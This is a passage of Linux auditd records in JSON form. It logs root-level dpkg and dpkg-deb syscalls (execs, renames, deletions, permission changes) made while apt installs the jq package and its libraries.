"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.873:555",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7639,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.873:556",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7639,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"dpkg-deb",
"--fsys-tarfile",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.877:557",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.881:558",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.881:559",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:560",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808426,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:561",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808426,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:562",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:563",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:564",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.897:565",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1.dpkg-new",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:566",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x1ed",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1.dpkg-new",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:567",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x41ed",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libjq1.dpkg-new",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libjq1",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:568",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:569",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:570",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:571",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808428,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:572",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808428,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:573",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:574",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:575",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
